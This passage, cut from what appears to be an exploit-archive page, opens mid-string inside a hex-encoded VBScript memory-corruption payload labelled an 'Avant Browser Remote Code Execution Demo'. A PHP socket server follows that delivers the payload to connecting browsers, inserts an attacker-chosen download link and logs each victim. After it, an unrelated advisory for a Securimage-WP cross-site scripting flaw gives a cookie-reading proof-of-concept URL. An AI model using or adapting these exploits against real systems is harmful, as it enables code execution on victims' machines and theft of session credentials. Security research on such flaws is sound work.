0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x3C\x3E\x30\x29\x20\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x20\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3D\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x54\x72\x75\x65\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3D\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x54\x72\x75\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6E\x39\x78\x3D\x31\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x20\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x72\x75\x6D\x28\x61\x64\x64\x29\x20\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3D\x61\x64\x64\x2B\x34\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x31\x2E\x36\x39\x37\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2D\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x75\x6D\x3D\x6C\x65\x6E\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x0D\x0A\x20\x3C\x63\x65\x6E\x74\x65\x72\x3E\x0D\x0A\x20\x3C\x73\x74\x72\x6F\x6E\x67\x3E\x41\x76\x61\x6E\x74\x20\x42\x72\x6F\x77\x73\x65\x72\x20\x52\x65\x6D\x6F\x74\x65\x20\x43\x6F\x64\x65\x20\x45\x78\x65\x63\x75\x74\x69\x6F\x6E\x20\x44\x65\x6D\x6F\x3C\x2F\x73\x74\x72\x6F\x6E\x67\x3E\x0D\x0A\x20\x3C\x62\x72\x20\x2F\x3E\x0D\x0A\x20\x3C\x69\x3E\x45\x68\x73\x61\x6E\x20\x4E\x6F\x72\x65\x64\x64\x69\x6E\x69\x20\x2D\x20\x40\x70\x72\x6F\x74\x33\x63\x74\x30\x72\x3C\x69\x3E\x0D\x0A\x20\x3C\x62\x72\x20\x2F\x3E\x3C\x69\x3E\x65\x68\x73\x61\x6E\x6E\x2E\x69\x6E\x66\x6F\x3C\x2F\x69\x3E\x0D\x0A\x20\x3C\x2F\x63\x65\x6E\x74\x65\x72\x3E\x0D\x0A\x3C\x2F\x62\x6F\x64\x79\x3E\x0D\x0A\x3C\x2F\x68\x74\x6D\x6C\x3E";
    $msgd=str_replace("DOWNLOAD",$link,$msgd);
    for (;;) {
        if ($client = @socket_accept($socket)) {
            socket_write($client, "HTTP/1.1 200 OK\r\n" .
                         "Content-length: " . strlen($msgd) . "\r\n" .
                         "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
                         $msgd);
            print "\n Target Checked Your Link \n";
        }
        else usleep(100000);
    }
     

    ?>
HireHackking 
source: https://www.securityfocus.com/bid/59816/info

The Securimage-WP plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Securimage-WP 3.2.4 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/securimage-wp/siwp_test.php/"/><script>alert(document.cookie);</script>?tested=1